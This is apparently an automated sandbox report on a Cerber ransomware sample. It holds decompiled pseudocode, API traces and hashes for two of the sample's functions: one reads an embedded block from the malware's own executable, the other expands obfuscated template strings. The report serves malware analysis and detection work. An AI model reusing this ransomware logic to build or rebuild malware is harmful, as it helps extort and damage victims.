API ID: CreateHandle$CloseErrorFileModuleNamememset$EventExitLastModeMutexObjectOpenProcessSingleStartupThreadWait
String ID: $C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe$X$d
API String ID: 489344662-1372600133
Opcode ID: 3828e64078428d27c5953f10f8617a0063ac8bdc38d5cb021f34b4e167a3d876
Instruction ID: 660d1c7cf976cc34eab42097ed30c14822809f0425eed3060e2e2b5ec831864e
Opcode Fuzzy Hash: 3828e64078428d27c5953f10f8617a0063ac8bdc38d5cb021f34b4e167a3d876
Instruction Fuzzy Hash: 6541AC32005310AFD320AB61ED4DE9F7BA8EF86765F00453EF045E61E0DB788549CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406C8C Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 284
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00406C8C(intOrPtr _a4) {
				char _v5;
				signed int _v12;
				DWORD* _v16;
				void* _v20;
				void* _v24;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t70;
				void* _t71;
				void* _t72;
				signed int _t74;
				intOrPtr _t79;
				void* _t80;
				signed int _t82;
				void* _t97;
				void* _t101;
				void* _t103;
				void* _t106;
				char* _t108;
				void* _t109;
				void* _t110;
				void* _t112;
				void* _t115;
				long _t117;
				intOrPtr* _t120;
				void* _t122;
				signed int _t127;
				signed int _t130;
				void* _t135;
				DWORD* _t138;
				signed int _t139;
				signed int _t140;
				void* _t146;
				void* _t147;
				void* _t148;
				signed int _t150;
				signed int _t152;
				void* _t153;
				void* _t154;
				void* _t156;
				void* _t157;
				signed int _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_v5 = 0;
				_t70 = CreateFileW("C:\Users\engineer\AppData\Local\Temp\Endermanch@Cerber5.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
				_v20 = _t70;
				if(_t70 == 0xffffffff) {
					L13:
					_t71 = CreateFileW("C:\Users\engineer\AppData\Local\Temp\Endermanch@Cerber5.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
					_t148 = _t71;
					_v16 = _t148;
					if(_t148 != 0xffffffff) {
						_t101 = CreateFileMappingW(_t148, 0, 2, 0, 0, 0); // executed
						_v20 = _t101;
						if(_t101 != 0) {
							_t103 = MapViewOfFile(_t101, 4, 0, 0, 0); // executed
							_t146 = _t103;
							if(_t146 != 0) {
								_t106 = GetFileSize(_t148, 0) + 0xfffffef6;
								_t153 = 0;
								_v24 = _t106;
								if(_t106 > 0) {
									do {
										_t108 = _t153 + _t146;
										if( *_t108 != 0x4c ||  *((char*)(_t153 + _t146 + 1)) != 0x82 ||  *((char*)(_t153 + _t146 + 2)) != 0xf3 ||  *((char*)(_t153 + _t146 + 3)) != 0x75 ||  *((char*)(_t153 + _t146 + 4)) != 0xf9 ||  *((char*)(_t153 + _t146 + 5)) != 0x76 ||  *((char*)(_t153 + _t146 + 6)) != 0x1f ||  *((char*)(_t153 + _t146 + 7)) != 0x51 ||  *((char*)(_t153 + _t146 + 8)) != 0xa) {
											goto L28;
										} else {
											_t183 =  *((char*)(_t153 + _t146 + 9)) - 0xc6;
											if( *((char*)(_t153 + _t146 + 9)) != 0xc6) {
												goto L28;
											} else {
												_push(_a4);
												_t47 = _t108 + 0x10a; // -4294966764
												_t153 = _t153 + 0xa; // executed
												_t109 = E00406A35(0, _t47, _t139, _t146, _t153, _t183); // executed
												if(_t109 == 0) {
													goto L28;
												}
											}
										}
										goto L29;
										L28:
										_t153 = _t153 + 1;
										_t185 = _t153 - _v24;
									} while (_t153 < _v24);
								}
								L29:
								UnmapViewOfFile(_t146);
							}
							FindCloseChangeNotification(_v20); // executed
						}
						CloseHandle(_v16);
					}
				} else {
					_t110 = CreateFileMappingW(_t70, 0, 2, 0, 0, 0); // executed
					_v24 = _t110;
					if(_t110 != 0) {
						_t112 = MapViewOfFile(_t110, 4, 0, 0, 0); // executed
						_t147 = _t112;
						if(_t147 != 0) {
							_t115 =  *((intOrPtr*)(_t147 + 0x3c)) + _t147;
							_t139 =  *(_t115 + 6) & 0x0000ffff;
							_t135 = ( *(_t115 + 0x14) & 0x0000ffff) + _t115 + 0x18;
							_t154 = 0;
							_v16 = 0;
							if(0 < _t139) {
								_t120 = _t135 + 0x14;
								_v12 = _t139;
								do {
									_t138 =  *_t120;
									if(_t138 > _v16) {
										_v16 = _t138;
										_t154 =  *((intOrPtr*)(_t120 - 4)) + _t138;
									}
									_t120 = _t120 + 0x28;
									_t15 =  &_v12;
									 *_t15 = _v12 - 1;
								} while ( *_t15 != 0);
							}
							_t117 = GetFileSize(_v20, 0);
							_t168 = _t117 - _t154;
							if(_t117 > _t154) {
								_push(_a4);
								_v5 = E00406A35(0, _t147 + _t117, _t139, _t147, _t154, _t168);
							}
							UnmapViewOfFile(_t147);
						}
						FindCloseChangeNotification(_v24); // executed
					}
					CloseHandle(_v20);
					if(_v5 == 0) {
						goto L13;
					}
				}
				_t72 = E00405905( &E0040D460, 7, 0xa798abfa);
				_t157 = _t156 + 0xc;
				_t74 = E004031AF(_a4, _t185, _t72);
				_pop(_t122);
				_v16 = _t74;
				if(_t74 != 0) {
					_t187 =  *0x42fa48; // 0x63dd7a0
					if(_t187 == 0) {
						_t97 = E00405905( &E0040D468, 3, 0xd0d06399);
						_t157 = _t157 + 0xc;
						_t74 = E0040596B(E004032B8(E004031AF(_v16, _t187, _t97), _t187));
						_pop(_t122);
						 *0x42fa48 = _t74;
					}
					_t140 =  *0x42f83c; // 0x5ed4420
					if(_t140 != 0) {
						__eflags =  *0x42fa4c - 5;
						if(__eflags < 0) {
							_t80 = 0x14;
							 *0x42f83c = E004053CA(_t80, _t122, _t140);
							_t74 =  *0x42fa4c; // 0x5
							__eflags = _t74 - 5;
							if(__eflags < 0) {
								_t150 = _t74 << 2;
								_t82 = _t74 + 1;
								__eflags = _t82;
								_v12 = _t82;
								do {
									_push(_v12);
									wsprintfA( &_v56, E00405905( &E0040D46C, 7, 0xc848aec3));
									_t157 = _t157 + 0x18;
									_t74 = E0040596B(E004032B8(E004031AF(_v16, __eflags,  &_v56), __eflags));
									 *0x42fa4c =  *0x42fa4c + 1;
									_v12 = _v12 + 1;
									_t127 =  *0x42f83c; // 0x5ed4420
									 *(_t150 + _t127) = _t74;
									_t150 = _t150 + 4;
									__eflags = _v12 - 6;
								} while (__eflags < 0);
							}
						}
					} else {
						_push(0x14);
						 *0x42fa4c = 5;
						_t74 = E004053B4(_t122);
						_t152 = 1;
						 *0x42f83c = _t74;
						_t189 =  *0x42fa4c - _t152; // 0x5
						if(_t189 >= 0) {
							do {
								_push(_t152);
								wsprintfA( &_v56, E00405905( &E0040D46C, 7, 0xc848aec3));
								_t157 = _t157 + 0x18;
								_t74 = E0040596B(E004032B8(E004031AF(_v16, _t189,  &_v56), _t189));
								_t130 =  *0x42f83c; // 0x5ed4420
								 *(_t130 + _t152 * 4 - 4) = _t74;
								_t152 = _t152 + 1;
								_t190 = _t152 -  *0x42fa4c; // 0x5
							} while (_t190 <= 0);
						}
					}
					_t191 =  *0x42fa50; // 0x5ed3e18
					if(_t191 == 0) {
						_t79 = E0040596B(E004032B8(E004031AF(_v16, _t191, E00405905(0x40d474, 4, 0x8969c48e)), _t191));
						 *0x42fa50 = _t79;
						return _t79;
					}
				}
				return _t74;
			}

0x00406ca8
0x00406cab
0x00406cb1
0x00406cb7
0x00406d5c
0x00406d6d
0x00406d73
0x00406d75
0x00406d7b
0x00406d88
0x00406d8e
0x00406d93
0x00406d9f
0x00406da5
0x00406da9
0x00406db7
0x00406dbc
0x00406dbe
0x00406dc3
0x00406dc5
0x00406dc5
0x00406dcb
0x00000000
0x00406e05
0x00406e05
0x00406e0a
0x00000000
0x00406e0c
0x00406e0c
0x00406e0f
0x00406e15
0x00406e18
0x00406e20
0x00000000
0x00000000
0x00406e20
0x00406e0a
0x00000000
0x00406e22
0x00406e22
0x00406e23
0x00406e23
0x00406dc5
0x00406e28
0x00406e29
0x00406e29
0x00406e32
0x00406e32
0x00406e3b
0x00406e3b
0x00406cbd
0x00406cc4
0x00406cca
0x00406ccf
0x00406cd7
0x00406cdd
0x00406ce1
0x00406ce6
0x00406cec
0x00406cf0
0x00406cf6
0x00406cf8
0x00406cfe
0x00406d00
0x00406d03
0x00406d06
0x00406d06
0x00406d0b
0x00406d10
0x00406d13
0x00406d13
0x00406d15
0x00406d18
0x00406d18
0x00406d18
0x00406d06
0x00406d21
0x00406d27
0x00406d29
0x00406d2b
0x00406d37
0x00406d37
0x00406d3b
0x00406d3b
0x00406d44
0x00406d44
0x00406d4d
0x00406d56
0x00000000
0x00000000
0x00406d56
0x00406e4d
0x00406e52
0x00406e59
0x00406e5e
0x00406e5f
0x00406e64
0x00406e6a
0x00406e70
0x00406e7e
0x00406e83
0x00406e98
0x00406e9d
0x00406e9e
0x00406e9e
0x00406ea3
0x00406eab
0x00406f29
0x00406f30
0x00406f34
0x00406f3a
0x00406f3f
0x00406f44
0x00406f47
0x00406f4b
0x00406f4e
0x00406f4e
0x00406f4f
0x00406f52
0x00406f52
0x00406f6e
0x00406f77
0x00406f8c
0x00406f91
0x00406f97
0x00406f9b
0x00406fa1
0x00406fa4
0x00406fa7
0x00406fa7
0x00406f52
0x00406f47
0x00406ead
0x00406ead
0x00406eb0
0x00406eba
0x00406ec1
0x00406ec2
0x00406ec7
0x00406ecd
0x00406ed3
0x00406ed3
0x00406eed
0x00406ef6
0x00406f0b
0x00406f11
0x00406f17
0x00406f1b
0x00406f1c
0x00406f1c
0x00406f24
0x00406ecd
0x00406fad
0x00406fb3
0x00406fdb
0x00406fe1
0x00000000
0x00406fe1
0x00406fb3
0x00406fea

APIs

CreateFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000), ref: 00406CAB
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406CC4
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00406CD7
GetFileSize.KERNEL32(?,00000000), ref: 00406D21
UnmapViewOfFile.KERNEL32(00000000), ref: 00406D3B
FindCloseChangeNotification.KERNEL32(?), ref: 00406D44
CloseHandle.KERNEL32(?), ref: 00406D4D
CreateFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D6D
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406D88
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00406D9F
GetFileSize.KERNEL32(00000000,00000000), ref: 00406DB1
UnmapViewOfFile.KERNEL32(00000000), ref: 00406E29
FindCloseChangeNotification.KERNEL32(?), ref: 00406E32
CloseHandle.KERNEL32(?), ref: 00406E3B
wsprintfA.USER32 ref: 00406EED
wsprintfA.USER32 ref: 00406F6E

Strings

C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, xrefs: 00406CA3, 00406D68

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$CloseCreateView$ChangeFindHandleMappingNotificationSizeUnmapwsprintf
String ID: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
API String ID: 3344029107-2487945927
Opcode ID: 1ec79b66cdb06aa3eeed9b5842f08f8950d5fbb49eff9659b7f10604049a1d1b
Instruction ID: 80c9848988a0ecdc918146eb7a2068c8117d091857d02b7a82775880087cebb1
Opcode Fuzzy Hash: 1ec79b66cdb06aa3eeed9b5842f08f8950d5fbb49eff9659b7f10604049a1d1b
Instruction Fuzzy Hash: 26A1E2B1D00205BFDB20ABA4EC85A6FBBB8EB04319F11457EF506F72D1D6388D598B58

Uniqueness

Uniqueness Score: -1.00%

Function 004078F0 Relevance: 29.1, APIs: 19, Instructions: 593
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E004078F0(char* __eax, void* __ecx, signed int __edx, intOrPtr* _a4) {
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				char _v35;
				signed int _v36;
				char _v47;
				signed int _v48;
				char _v59;
				signed int _v60;
				char _v71;
				signed int _v72;
				char _v83;
				signed int _v84;
				char _v95;
				char _v96;
				char _v107;
				int _v108;
				void* _v119;
				signed int _v120;
				void* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				char _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				char _v252;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t147;
				intOrPtr* _t148;
				char* _t150;
				int _t151;
				char* _t152;
				signed int _t153;
				char* _t154;
				signed int _t155;
				char* _t156;
				signed int _t157;
				char* _t158;
				signed int _t159;
				char* _t160;
				signed int _t161;
				char* _t162;
				char* _t164;
				signed int _t165;
				char* _t166;
				signed int _t167;
				char* _t168;
				signed int _t169;
				char* _t170;
				signed int _t171;
				char* _t172;
				signed int _t173;
				void* _t174;
				signed int _t175;
				char* _t176;
				signed int _t177;
				char* _t178;
				signed int _t179;
				char _t180;
				void* _t181;
				void* _t182;
				intOrPtr _t189;
				signed int _t190;
				void* _t192;
				signed int* _t195;
				intOrPtr _t199;
				void* _t202;
				void* _t209;
				signed int* _t212;
				intOrPtr _t225;
				intOrPtr _t226;
				char _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				intOrPtr _t231;
				void* _t239;
				signed char* _t248;
				void* _t257;
				signed int _t273;
				void* _t276;
				signed int _t289;
				signed int _t291;
				signed int _t297;
				signed int _t302;
				char _t303;
				int _t304;
				int _t305;
				int _t306;
				char* _t317;
				void* _t318;
				void* _t319;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr _t342;

				_t302 = __edx;
				_t317 = __eax;
				_t303 =  *0x40f19c(__eax);
				_v12 = _t303;
				_v20 = _t303;
				_t147 = E004053B4(__ecx);
				_v24 = _t147;
				_v16 = _t147;
				if(_t303 != 0) {
					do {
						_t150 = E00405905(0x40d5a4, 0xa, 0x56bd498f);
						_t320 = _t319 + 0xc;
						_t151 = StrCmpNIA(_t317, _t150, 0xa);
						if(_t151 != 0) {
							_t288 = 8;
							_t152 = E00405905(0x40d5b4, _t288, 0x2722de43);
							_t321 = _t320 + 0xc;
							_t153 = StrCmpNIA(_t317, _t152, _t288);
							__eflags = _t153;
							if(_t153 != 0) {
								_t154 = E00405905(0x40d5c0, 0xc, 0xb14abe67);
								_t322 = _t321 + 0xc;
								_t155 = StrCmpNIA(_t317, _t154, 0xc);
								__eflags = _t155;
								if(__eflags != 0) {
									_t156 = E00405905(0x40d5d8, 4, 0xe25b1adf);
									_t323 = _t322 + 0xc;
									_t157 = StrCmpNIA(_t317, _t156, 4);
									__eflags = _t157;
									if(_t157 != 0) {
										_t304 = 7;
										_t158 = E00405905(0x40d5e4, _t304, 0xb3703cf2);
										_t324 = _t323 + 0xc;
										_t159 = StrCmpNIA(_t317, _t158, _t304);
										__eflags = _t159;
										if(_t159 != 0) {
											_t305 = 0xd;
											_t160 = E00405905(0x40d5ec, _t305, 0x21a218b0);
											_t325 = _t324 + 0xc;
											_t161 = StrCmpNIA(_t317, _t160, _t305);
											__eflags = _t161;
											if(_t161 != 0) {
												_t306 = 9;
												_t162 = E00405905(0x40d5fc, _t306, 0x9bb0187b);
												_t326 = _t325 + 0xc;
												__eflags = StrCmpNIA(_t317, _t162, _t306);
												if(__eflags != 0) {
													_t164 = E00405905(0x40d624, 0xd, 0x33cb5a3c);
													_t327 = _t326 + 0xc;
													_t165 = StrCmpNIA(_t317, _t164, 0xd);
													__eflags = _t165;
													if(_t165 != 0) {
														_t306 = 6;
														_t166 = E00405905( &E0040D634, _t306, 0x7becdfb7);
														_t328 = _t327 + 0xc;
														_t167 = StrCmpNIA(_t317, _t166, _t306);
														__eflags = _t167;
														if(_t167 != 0) {
															_t168 = E00405905( &E0040D63C, 5, 0xc8742f37);
															_t329 = _t328 + 0xc;
															_t169 = StrCmpNIA(_t317, _t168, 5);
															__eflags = _t169;
															if(_t169 != 0) {
																_t170 = E00405905(0x40d644, _t288, 0x1d904ab5);
																_t330 = _t329 + 0xc;
																_t171 = StrCmpNIA(_t317, _t170, _t288);
																__eflags = _t171;
																if(_t171 != 0) {
																	_t172 = E00405905(0x40d650, _t306, 0x32a36edb);
																	_t328 = _t330 + 0xc;
																	_t173 = StrCmpNIA(_t317, _t172, _t306);
																	_push(_t306);
																	__eflags = _t173;
																	if(_t173 != 0) {
																		_t174 = E00405905(0x40d658, _t306, 0x14143ff2);
																		_t331 = _t328 + 0xc;
																		_push(_t174);
																		_t175 = StrCmpNIA(_t317);
																		__eflags = _t175;
																		if(__eflags != 0) {
																			_t176 = E00405905( &E0040D660, _t306, 0x65d2c9e3);
																			_t332 = _t331 + 0xc;
																			_t177 = StrCmpNIA(_t317, _t176, _t306);
																			__eflags = _t177;
																			if(_t177 != 0) {
																				_t178 = E00405905(0x40d59c, _t306, 0x95a0a06d);
																				_t319 = _t332 + 0xc;
																				_t179 = StrCmpNIA(_t317, _t178, _t306);
																				__eflags = _t179;
																				if(_t179 != 0) {
																					_t294 = _v16;
																					_t180 =  *_t317;
																					_v16 = _v16 + 1;
																					_t317 =  &(_t317[1]);
																					_t139 =  &_v12;
																					 *_t139 = _v12 - 1;
																					__eflags =  *_t139;
																					 *_v16 = _t180;
																				} else {
																					_v120 = _t179;
																					asm("stosd");
																					asm("stosd");
																					asm("stosw");
																					_t181 = 0xa;
																					_t182 = E00406444(_t181, 1);
																					_t294 =  &_v120;
																					__eflags = _t182 + 1;
																					E00405DFA(_t182 + 1,  &_v120, _t302,  &_v120);
																					_t288 =  &_v16;
																					E004077C8( &_v20,  &_v16,  &_v120,  &_v24,  &_v120, 6);
																					_t319 = _t319 + 0x10;
																					goto L44;
																				}
																			} else {
																				_v72 = _t177;
																				asm("stosd");
																				asm("stosd");
																				asm("stosb");
																				_t189 =  *0x42fa58; // 0x3000
																				asm("cdq");
																				_t302 = _t302 & 0x00000fff;
																				_t190 = _t189 + _t302;
																				__eflags = _t190;
																				_push(_t190 >> 0xc);
																				_t192 = E00405905(0x40d5e0, 2, 0x3437bb9c);
																				_t333 = _t332 + 0xc;
																				_push(_t192);
																				_push( &_v72);
																				E00405ACD(_t288,  &_v71, _t317, _t190);
																				_t195 =  &_v72;
																				goto L41;
																			}
																		} else {
																			_v48 = _t175;
																			asm("stosd");
																			asm("stosd");
																			asm("stosb");
																			_t199 =  *0x42fa54; // 0x3000
																			asm("cdq");
																			_t302 = _t302 & 0x00000fff;
																			_push(_t199 + _t302 >> 0xc);
																			_t202 = E00405905(0x40d5e0, 2, 0x3437bb9c);
																			_t333 = _t331 + 0xc;
																			_push(_t202);
																			_push( &_v48);
																			E00405ACD(_t288,  &_v47, _t317, __eflags);
																			_t195 =  &_v48;
																			L41:
																			_t288 =  &_v16;
																			E004077C8( &_v20,  &_v16, _t294,  &_v24, _t195, 6);
																			_t319 = _t333 + 0x18;
																			L44:
																			_t317 =  &(_t317[6]);
																			_v12 = _v12 - 6;
																		}
																	} else {
																		_push( *0x42fa50);
																		goto L35;
																	}
																} else {
																	__eflags =  *0x42f79d - _t171;
																	_t103 =  *0x42f79d != _t171;
																	__eflags = _t103;
																	_push(_t171 & 0xffffff00 | _t103);
																	_t209 = E00405905(0x40d5b0, 2, 0xef6a5f2b);
																	_t334 = _t330 + 0xc;
																	_push(_t209);
																	_push( &_v252);
																	E00405ACD(_t288, _t306, _t317, _t103);
																	_t212 =  &_v252;
																	goto L32;
																}
															} else {
																_t288 =  &_v16;
																E004077C8( &_v20,  &_v16, _t294,  &_v24,  *0x42fa48, 5);
																_t319 = _t329 + 0xc;
																_t317 =  &(_t317[5]);
																_v12 = _v12 - 5;
															}
														} else {
															_t93 =  &(_t317[6]); // 0x6
															_t289 = StrToIntA(_t93);
															_t306 =  &((StrChrA(_t317, 0x7d))[1 - _t317]);
															__eflags = _t289 -  *0x42fa4c;
															if(_t289 >  *0x42fa4c) {
																_t289 = 1;
																__eflags = 1;
															}
															_t225 =  *0x42f83c; // 0x5ed4420
															_push(_t306);
															_t95 = _t289 * 4; // 0xabbababa
															_push( *((intOrPtr*)(_t225 + _t95 - 4)));
															goto L35;
														}
													} else {
														_t226 = 0x14;
														_v236 = _t226;
														_v232 = _t226;
														_t227 = 0x28;
														_v228 = _t227;
														_v224 = _t227;
														_t228 = 0x3c;
														_v220 = _t228;
														_v216 = _t228;
														_t229 = 0x50;
														_v212 = _t229;
														_v208 = _t229;
														_t230 = 0x64;
														_v204 = _t230;
														_v200 = _t230;
														_t231 = _t230 + 0x32;
														_v196 = _t231;
														_v192 = _t231;
														_v188 = 0xc8;
														_v184 = 0xc8;
														_v180 = 0xc8;
														_v176 = 0xfa;
														_v172 = 0x12c;
														_v168 = 0x12c;
														_v164 = 0x12c;
														_v160 = 0x15e;
														_v156 = 0x190;
														_v152 = 0x190;
														_v140 = 0x2ee;
														_v136 = 0x2ee;
														_t291 = 0;
														_v240 = 0;
														_v148 = 0x1c2;
														_v144 = 0x1f4;
														_v132 = 0x3e8;
														_v128 = 0x3e7;
														asm("stosd");
														_t239 = E0040AC85();
														_push(0);
														_push(0x40000000);
														_push(_t302);
														_push(_t239);
														L0040B7B6();
														_t297 = 0;
														__eflags = 0;
														do {
															__eflags = _t239 -  *((intOrPtr*)(_t318 + _t297 * 8 - 0xec));
															if(_t239 <  *((intOrPtr*)(_t318 + _t297 * 8 - 0xec))) {
																goto L20;
															} else {
																__eflags = _t239 -  *((intOrPtr*)(_t318 + _t297 * 8 - 0xe8));
																if(__eflags < 0) {
																	_t291 = _t297;
																} else {
																	goto L20;
																}
															}
															L23:
															_v96 = 0;
															asm("stosd");
															_push(_t291);
															asm("stosd");
															asm("stosb");
															_push(E00405905(0x40d5e0, 2, 0x3437bb9c));
															_push( &_v96);
															E00405ACD(_t291,  &_v95, _t317, __eflags);
															_t288 =  &_v16;
															E004077C8( &_v20,  &_v16, _t297,  &_v24,  &_v96, 0xd);
															_t319 = _t327 + 0x24;
															_t317 =  &(_t317[0xd]);
															_v12 = _v12 - 0xd;
															goto L46;
															L20:
															_t297 = _t297 + 1;
															__eflags = _t297 - 0xf;
														} while (__eflags < 0);
														goto L23;
													}
												} else {
													_t248 = E0040251C();
													_push(_t248[5] & 0x000000ff);
													_push(_t248[4] & 0x000000ff);
													_push(_t248[3] & 0x000000ff);
													_push(_t248[2] & 0x000000ff);
													_t294 = _t248[1] & 0x000000ff;
													_push(_t248[1] & 0x000000ff);
													_push( *_t248 & 0x000000ff);
													_push(E00405905(0x40d608, 0x18, 0x59315b46));
													_push( &_v224);
													E00405ACD(_t288, _t306, _t317, __eflags);
													_t288 =  &_v16;
													E004077C8( &_v20,  &_v16, _t248[1] & 0x000000ff,  &_v24,  &_v224, _t306);
													_t319 = _t326 + 0x38;
													goto L36;
												}
											} else {
												_push(_t305);
												_t257 = E00408107();
												goto L13;
											}
										} else {
											_push(_t304);
											_t257 = E00407076(_t288, _t294, _t304);
											L13:
											_push(_t257);
											L35:
											_push( &_v24);
											_t288 =  &_v16;
											E004077C8( &_v20,  &_v16, _t294);
											_t319 = _t328 + 0xc;
											L36:
											_t317 =  &(_t317[_t306]);
											_v12 = _v12 - _t306;
										}
									} else {
										_v84 = _t157;
										asm("stosd");
										asm("stosd");
										asm("stosb");
										_push(E004076BB());
										_push(E00405905(0x40d5e0, 2, 0x3437bb9c));
										_push( &_v84);
										E00405ACD(_t288,  &_v83, _t317, __eflags);
										_t288 =  &_v16;
										E004077C8( &_v20,  &_v16, _t294,  &_v24,  &_v84, 4);
										_t319 = _t323 + 0x24;
										_t317 =  &(_t317[4]);
										_v12 = _v12 - 4;
									}
								} else {
									_push( *0x40fc6c);
									_v36 = _t155;
									asm("stosd");
									asm("stosd");
									asm("stosb");
									_push(E00405905(0x40d5d0, 4, 0x7ef7fcfd));
									_push( &_v36);
									E00405ACD(_t288,  &_v35, _t317, __eflags);
									_t288 =  &_v16;
									E004077C8( &_v20,  &_v16, _t294,  &_v24,  &_v36, 0xc);
									_t319 = _t322 + 0x24;
									_t317 =  &(_t317[0xc]);
									_v12 = _v12 - 0xc;
								}
							} else {
								_v60 = _t153;
								asm("stosd");
								asm("stosd");
								asm("stosb"); // executed
								_t273 = E00405FC4(); // executed
								asm("sbb eax, eax");
								_push( ~( ~_t273));
								_t276 = E00405905(0x40d5b0, 2, 0xef6a5f2b);
								_t334 = _t321 + 0xc;
								_push(_t276);
								_push( &_v60);
								E00405ACD(_t288,  &_v59, _t317, __eflags);
								_t212 =  &_v60;
								L32:
								_t288 =  &_v16;
								E004077C8( &_v20,  &_v16, _t294,  &_v24, _t212,  &_v16);
								_t319 = _t334 + 0x18;
								_t317 =  &(_t317[8]);
								_v12 = _v12 - 8;
							}
						} else {
							_v108 = _t151;
							asm("stosd");
							asm("stosd");
							asm("stosb");
							_t342 =  *0x42f7a7; // 0x1
							_push(0 | _t342 != 0x00000000);
							_push(E00405905(0x40d5b0, 2, 0xef6a5f2b));
							_push( &_v108);
							E00405ACD(_t288,  &_v107, _t317, _t342);
							_t288 =  &_v16;
							E004077C8( &_v20,  &_v16, _t294,  &_v24,  &_v108, 0xa);
							_t319 = _t320 + 0x24;
							_t317 =  &(_t317[0xa]);
							_v12 = _v12 - 0xa;
						}
						L46:
					} while (_v12 != 0);
				}
				_t148 = _a4;
				if(_t148 != 0) {
					 *_t148 = _v20;
				}
				return _v24;
			}

0x004078f0
0x004078fc
0x00407905
0x00407907
0x0040790a
0x0040790d
0x00407912
0x00407915
0x0040791a
0x00407920
0x0040792e
0x00407933
0x00407938
0x00407940
0x0040799b
0x004079a8
0x004079ad
0x004079b2
0x004079b8
0x004079ba
0x00407a05
0x00407a0a
0x00407a0f
0x00407a15
0x00407a17
0x00407a78
0x00407a7d
0x00407a82
0x00407a88
0x00407a8a
0x00407adf
0x00407aec
0x00407af1
0x00407af6
0x00407afc
0x00407afe
0x00407b0a
0x00407b17
0x00407b1c
0x00407b21
0x00407b27
0x00407b29
0x00407b39
0x00407b46
0x00407b4b
0x00407b56
0x00407b58
0x00407bca
0x00407bcf
0x00407bd4
0x00407bda
0x00407bdc
0x00407d4f
0x00407d5c
0x00407d61
0x00407d66
0x00407d6c
0x00407d6e
0x00407db6
0x00407dbb
0x00407dc0
0x00407dc6
0x00407dc8
0x00407dfc
0x00407e01
0x00407e06
0x00407e0c
0x00407e0e
0x00407e6d
0x00407e72
0x00407e77
0x00407e7d
0x00407e7e
0x00407e80
0x00407eaf
0x00407eb4
0x00407eb7
0x00407eb9
0x00407ebf
0x00407ec1
0x00407f0d
0x00407f12
0x00407f17
0x00407f1d
0x00407f1f
0x00407f80
0x00407f85
0x00407f8a
0x00407f90
0x00407f92
0x00407fd4
0x00407fd7
0x00407fd9
0x00407fdc
0x00407fdd
0x00407fdd
0x00407fdd
0x00407fe0
0x00407f94
0x00407f94
0x00407f9a
0x00407f9b
0x00407f9e
0x00407fa2
0x00407fa4
0x00407fa9
0x00407fac
0x00407fae
0x00407fc0
0x00407fc3
0x00407fc8
0x00000000
0x00407fc8
0x00407f21
0x00407f21
0x00407f27
0x00407f28
0x00407f29
0x00407f2a
0x00407f2f
0x00407f30
0x00407f36
0x00407f36
0x00407f3b
0x00407f48
0x00407f4d
0x00407f50
0x00407f54
0x00407f55
0x00407f5a
0x00000000
0x00407f5a
0x00407ec3
0x00407ec3
0x00407ec9
0x00407eca
0x00407ecb
0x00407ecc
0x00407ed1
0x00407ed2
0x00407edd
0x00407eea
0x00407eef
0x00407ef2
0x00407ef6
0x00407ef7
0x00407efc
0x00407f5d
0x00407f67
0x00407f6a
0x00407f6f
0x00407fcb
0x00407fcb
0x00407fce
0x00407fce
0x00407e82
0x00407e82
0x00000000
0x00407e82
0x00407e10
0x00407e10
0x00407e16
0x00407e16
0x00407e19
0x00407e26
0x00407e2b
0x00407e2e
0x00407e35
0x00407e36
0x00407e3b
0x00000000
0x00407e3b
0x00407dca
0x00407dd9
0x00407ddc
0x00407de1
0x00407de4
0x00407de7
0x00407de7
0x00407d70
0x00407d70
0x00407d7d
0x00407d8c
0x00407d8e
0x00407d94
0x00407d98
0x00407d98
0x00407d98
0x00407d99
0x00407d9e
0x00407d9f
0x00407d9f
0x00000000
0x00407d9f
0x00407be2
0x00407be4
0x00407be5
0x00407beb
0x00407bf3
0x00407bf4
0x00407bfa
